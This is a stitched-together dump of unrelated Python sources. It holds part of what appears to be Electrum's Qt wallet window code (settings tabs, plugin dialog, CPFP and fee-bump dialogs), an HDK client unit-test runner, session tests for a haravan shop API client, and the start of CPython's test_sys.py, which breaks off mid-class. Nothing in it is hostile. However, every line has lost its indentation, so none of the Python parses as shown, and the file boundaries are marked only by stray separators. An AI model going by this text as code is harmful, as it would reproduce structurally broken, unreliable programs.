self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_fee = self.wallet.get_tx_fee(parent_tx)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
fee = self.wallet.get_tx_fee(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, config=self.config)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
runtests.py
|
#!/usr/bin/python
##########################################################################
# If not stated otherwise in this file or this component's Licenses.txt
# file the following copyright and licenses apply:
#
# Copyright 2015 RDK Management
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
#######################################################################
# Copyright [2014] [Cisco Systems, Inc.]
#
# Licensed under the Apache License, Version 2.0 (the \"License\");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an \"AS IS\" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#######################################################################
#
# unittest.py - HDK client library unit tests
#
import optparse
import os
import platform
import re
import shutil
import subprocess
import sys
import unittest
import threading
from unittest_server import UnittestServer
from urlparse import urlparse
# Import HDK modules
sys.path.append(os.path.join(os.path.dirname(sys.argv[0]), "..", "..", "bin", "lib"))
from hdk.testutil import BuildSuite, ActualDiffers
#
# Main
#
def main():
# Command line options
cmdParser = optparse.OptionParser()
cmdParser.add_option("-r", action = "store_true", dest = "bNoClean",
help = "No clean build")
cmdParser.add_option("-m", action = "store_true", dest = "bCheckMallocStats",
help = "Check malloc statistics")
cmdParser.add_option("-t", action = "append", dest = "testsIncluded",
help = "Run specified tests", metavar = "test")
cmdParser.add_option("-u", action = "store_true", dest = "bUpdateExpected",
help = "Update expected output")
cmdParser.add_option("--debug", action = "store_true", dest = "bDebug",
help = "Build debug binaries")
(cmdOptions, cmdArgs) = cmdParser.parse_args()
# The unittest directory
unittestDir = os.path.dirname(sys.argv[0])
if not unittestDir:
unittestDir = '.'
# Create the test runner
runner = unittest.TextTestRunner(verbosity = 2)
# Build test suite
buildDirs = (os.path.join("build", "libhdkcli"),
os.path.join("build", "libhdkcli-c++"),
os.path.join("build", "libhdkcli-logging"),
os.path.join("build", "libhdkcli-c++-logging"))
bWindowsPlatform = (platform.system() == 'Windows')
bDarwinPlatform = (platform.system() == 'Darwin')
# Build target (platform dependant)
if bWindowsPlatform:
buildTarget = "libhdkcli.dll"
elif bDarwinPlatform:
buildTarget = "libhdkcli.dylib"
else:
buildTarget = "libhdkcli.so"
buildSuite = BuildSuite(unittestDir, buildDirs, buildTarget,
not cmdOptions.bNoClean, cmdOptions.bDebug, cmdOptions.bUpdateExpected)
if not runner.run(buildSuite).wasSuccessful():
return 1
# Location of the test definitions and parameters.
dirTests = os.path.join(unittestDir, "tests")
# Run the unittests for each target.
unittestSuite = ClientUnittestSuite()
for buildDir in ((os.path.join(unittestDir, "build", "unittest-logging")),
(os.path.join(unittestDir, "build", "unittest-c++"))):
unittestSuite.addTest(dirTests, buildDir, "unittest",
cmdOptions.bCheckMallocStats,
cmdOptions.bUpdateExpected,
testsExplicit = cmdOptions.testsIncluded)
# Only update expected results with gold (first build dir)
if cmdOptions.bUpdateExpected:
break
if not runner.run(unittestSuite).wasSuccessful():
return 1
# Success
return 0
######################################################################
#
# HDK client Unit Test Suite
#
######################################################################
class ClientUnittestSuite(unittest.TestSuite):
def __init__(self):
unittest.TestSuite.__init__(self)
def addTest(self, dirTests, buildDir, target, bCheckMallocStats, bUpdateExpected, testsExplicit = None):
testNames = sorted(os.listdir(dirTests))
for testName in testNames:
testDir = os.path.join(dirTests, testName)
if os.path.isdir(testDir) and testName[0] != '.':
if testsExplicit is None or testName in testsExplicit:
test = ClientUnittestTest(testName, testDir, buildDir, target,
bCheckMallocStats,
bUpdateExpected)
unittest.TestSuite.addTest(self, test)
class ClientUnittestTest(unittest.TestCase):
__defaultHttpHost = "http://localhost:8080"
def __init__(self, testName, testDir, buildDir, target, bCheckMallocStats, bUpdateExpected):
unittest.TestCase.__init__(self)
self.__testDir = testDir
self.__buildDir = buildDir
self.__target = target
self.__test = testName
self.__bCheckMallocStats = bCheckMallocStats
self.__bUpdateExpected = bUpdateExpected
self.__methodName = None # the SOAPAction for the method
self.__networkObjectID = None
self.__httpHost = ClientUnittestTest.__defaultHttpHost
self.__httpUsername = None
self.__httpPassword = None
self.__httpTimeout = None
self.__platformExpected = False
# Input files are assumed to be named <Testname>.input.xml
self.__hnapInputFile = None
hnapInputFile = os.path.join(self.__testDir, (testName + ".input.xml"))
if os.path.exists(hnapInputFile):
self.__hnapInputFile = hnapInputFile
# Output files are assumed to be named <Testname>.output
self.__hnapOutputFile = None
hnapOutputFile = os.path.join(self.__testDir, (testName + ".output"))
if os.path.exists(hnapOutputFile):
self.__hnapOutputFile = hnapOutputFile
# Load the test parameters.
fileTestSpec = os.path.join(self.__testDir, (testName + ".test"))
if not os.path.exists(fileTestSpec):
self.fail("Test parameters do not exist for test '%s'. File '%s' does not exist." % (testName, fileTestSpec))
self.parseTestSpec(fileTestSpec)
if self.__methodName is None:
self.fail("No method specified for test '%s' in test file '%s'" % (testName, fileTestSpec))
def __str__(self):
return os.path.join(self.__buildDir, self.__target) + " " + self.__test
def parseTestSpec(self, testSpecFilePath):
# Parse test cases from spec file
fhTestSpec = open(testSpecFilePath, "rb")
reMethodNone = re.compile('^method:\s*(#.*)?$')
reMethod = re.compile('^method:\s*"?\s*(?P<method>.+?)\s*"?\s*(#.*)?$')
reHttpHost = re.compile('^host:\s*"?\s*(?P<host>.+?)\s*"?\s*(#.*)?$')
reNetworkObjectID = re.compile('^network-object-id:\s*"?\s*(?P<id>.+?)\s*"?\s*(#.*)?$')
reHttpUsername = re.compile('^username:\s*"?\s*(?P<username>.+?)\s*"?\s*(#.*)?$')
reHttpPassword = re.compile('^password:\s*"?\s*(?P<password>.+?)\s*"?\s*(#.*)?$')
reHttpTimeout = re.compile('^timeout:\s*"?\s*(?P<timeout>.+?)\s*"?\s*(#.*)?$')
reHttpPlatformExpected = re.compile('^platform-expected\s*(#.*)?$')
reComment = re.compile("^\s*(#.*)?$")
try:
for line in fhTestSpec:
# Don't care about whitespace or comment lines
if reComment.search(line):
continue
# Handle a method
m = reMethodNone.match(line)
if m:
self.__methodName = ""
continue
m = reMethod.match(line)
if m:
self.__methodName = m.group("method")
continue
m = reNetworkObjectID.match(line)
if m:
self.__networkObjectID = m.group("id")
continue
m = reHttpHost.match(line)
if m:
self.__httpHost = m.group("host")
continue
m = reHttpUsername.match(line)
if m:
self.__httpUsername = m.group("username")
continue
m = reHttpPassword.match(line)
if m:
self.__httpPassword = m.group("password")
continue
m = reHttpTimeout.match(line)
if m:
self.__httpTimeout = m.group("timeout")
continue
m = reHttpPlatformExpected.match(line)
if m:
self.__platformExpected = True
continue
# Raise an exception if we don't match the line
else:
raise Exception("Invalid line '%s' in test file '%s'" % (line, testSpecFilePath))
finally:
fhTestSpec.close()
def runTest(self):
# Actual and expected file locations
actualDir = os.path.join(self.__testDir, os.path.join("actual", os.path.split(self.__buildDir)[1]))
expectedDir = os.path.join(self.__testDir, "expected")
actual = os.path.join(actualDir, self.__test + ".txt")
expectedSuffix = ""
if self.__platformExpected:
if platform.system() == 'Windows':
expectedSuffix = "-Windows"
expected = os.path.join(expectedDir, self.__test + expectedSuffix + ".txt")
# Generate the command line arguments for the unittest harness binary.
cmdLineArgs = "\"" + self.__methodName + "\" \"" + self.__httpHost + "\""
if self.__networkObjectID is not None:
cmdLineArgs = cmdLineArgs + " -o" + self.__networkObjectID
if self.__httpUsername is not None:
cmdLineArgs = cmdLineArgs + " -u" + self.__httpUsername
if self.__httpPassword is not None:
cmdLineArgs = cmdLineArgs + " -p" + self.__httpPassword
if self.__httpTimeout is not None:
cmdLineArgs = cmdLineArgs + " -t" + self.__httpTimeout
# Write logging output to <Testname>.log
cmdLineArgs = cmdLineArgs + " -l\"" + os.path.join(actualDir, self.__test + ".log\"")
if self.__hnapInputFile is not None:
cmdLineArgs = cmdLineArgs + " " + self.__hnapInputFile
# Write the actual file
if not os.path.isdir(actualDir):
os.makedirs(actualDir)
if os.path.isfile(actual):
os.remove(actual)
fhActual = open(actual, "wb")
try:
server = None
# Parse the host and port from the http host URL
url = urlparse(self.__httpHost)
host = url.netloc
port = url.port
if port is None:
if url.scheme == "https":
port = 443
else:
port = 80
else:
# Must remove the port from the host
host = re.search('(?P<host>.+?):\d', host).group("host")
if host:
server = UnittestServer(self.__testDir, host = host, port = port, fhLogFile = fhActual)
# Use serve_forever so we can easily shutdown the server in the event of some exception trying to run the client code.
serverThread = threading.Thread(target = server.serve_forever)
serverThread.start()
try:
if platform.system() == 'Windows':
env = { 'SystemRoot': os.environ['SystemRoot'] } # SystemRoot is required for SxS c runtime
elif platform.system() == 'Darwin':
env = { 'DYLD_LIBRARY_PATH': self.__buildDir,
'DYLD_INSERT_LIBRARIES': os.path.join(self.__buildDir, 'malloc_interposer.dylib') }
else:
env = { 'LD_LIBRARY_PATH': self.__buildDir,
'LD_PRELOAD': os.path.join(self.__buildDir, "malloc_interposer.so") }
# Run the test
unittestProcess = subprocess.Popen(os.path.join(self.__buildDir, self.__target) + " " + cmdLineArgs, shell = True,
env = env,
stdout = subprocess.PIPE, stderr = subprocess.STDOUT)
output = unittestProcess.communicate()[0]
result = unittestProcess.wait()
if result != 0:
self.fail(output)
fhActual.write("\n******* Client Result ******\n")
fhActual.write(output)
finally:
if server is not None:
# Wait until the server thread exits.
server.shutdown()
serverThread.join()
finally:
fhActual.close()
fnDiffIgnore = []
# Compare actual and expected files
actualResult = ActualDiffers(actual, expected, self.__bUpdateExpected,
bIgnoreMallocStats = not self.__bCheckMallocStats,
fnDiffIgnore = fnDiffIgnore)
if actualResult:
self.fail(actualResult)
######################################################################
if __name__ == "__main__":
sys.exit(main())
|
base_test.py
|
import haravan
from test.test_helper import TestCase
from pyactiveresource.activeresource import ActiveResource
from mock import patch
import threading
class BaseTest(TestCase):
@classmethod
def setUpClass(self):
self.session1 = haravan.Session('shop1.myharavan.com', 'token1')
self.session2 = haravan.Session('shop2.myharavan.com', 'token2')
def setUp(self):
super(BaseTest, self).setUp()
def tearDown(self):
haravan.HaravanResource.clear_session()
def test_activate_session_should_set_site_and_headers_for_given_session(self):
haravan.HaravanResource.activate_session(self.session1)
self.assertIsNone(ActiveResource.site)
self.assertEqual('https://shop1.myharavan.com/admin', haravan.HaravanResource.site)
self.assertEqual('https://shop1.myharavan.com/admin', haravan.Shop.site)
self.assertIsNone(ActiveResource.headers)
self.assertEqual('token1', haravan.HaravanResource.headers['X-Haravan-Access-Token'])
self.assertEqual('token1', haravan.Shop.headers['X-Haravan-Access-Token'])
def test_clear_session_should_clear_site_and_headers_from_Base(self):
haravan.HaravanResource.activate_session(self.session1)
haravan.HaravanResource.clear_session()
self.assertIsNone(ActiveResource.site)
self.assertIsNone(haravan.HaravanResource.site)
self.assertIsNone(haravan.Shop.site)
self.assertIsNone(ActiveResource.headers)
self.assertFalse('X-Haravan-Access-Token' in haravan.HaravanResource.headers)
self.assertFalse('X-Haravan-Access-Token' in haravan.Shop.headers)
def test_activate_session_with_one_session_then_clearing_and_activating_with_another_session_shoul_request_to_correct_shop(self):
haravan.HaravanResource.activate_session(self.session1)
haravan.HaravanResource.clear_session()
haravan.HaravanResource.activate_session(self.session2)
self.assertIsNone(ActiveResource.site)
self.assertEqual('https://shop2.myharavan.com/admin', haravan.HaravanResource.site)
self.assertEqual('https://shop2.myharavan.com/admin', haravan.Shop.site)
self.assertIsNone(ActiveResource.headers)
self.assertEqual('token2', haravan.HaravanResource.headers['X-Haravan-Access-Token'])
self.assertEqual('token2', haravan.Shop.headers['X-Haravan-Access-Token'])
def test_delete_should_send_custom_headers_with_request(self):
haravan.HaravanResource.activate_session(self.session1)
org_headers=haravan.HaravanResource.headers
haravan.HaravanResource.set_headers({'X-Custom': 'abc'})
with patch('haravan.HaravanResource.connection.delete') as mock:
url = haravan.HaravanResource._custom_method_collection_url('1', {})
haravan.HaravanResource.delete('1')
mock.assert_called_with(url, {'X-Custom': 'abc'})
haravan.HaravanResource.set_headers(org_headers)
def test_headers_includes_user_agent(self):
self.assertTrue('User-Agent' in haravan.HaravanResource.headers)
t = threading.Thread(target=lambda: self.assertTrue('User-Agent' in haravan.HaravanResource.headers))
t.start()
t.join()
def test_headers_is_thread_safe(self):
def testFunc():
haravan.HaravanResource.headers['X-Custom'] = 'abc'
self.assertTrue('X-Custom' in haravan.HaravanResource.headers)
t1 = threading.Thread(target=testFunc)
t1.start()
t1.join()
t2 = threading.Thread(target=lambda: self.assertFalse('X-Custom' in haravan.HaravanResource.headers))
t2.start()
t2.join()
|
test_sys.py
|
import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, assert_python_failure
from test.support import threading_helper
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
with self.assertRaises(RecursionError):
f()
with self.assertRaises(RecursionError):
f()
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than limit.
from _testinternalcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
set_recursion_limit_at_depth(limit, limit)
finally:
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
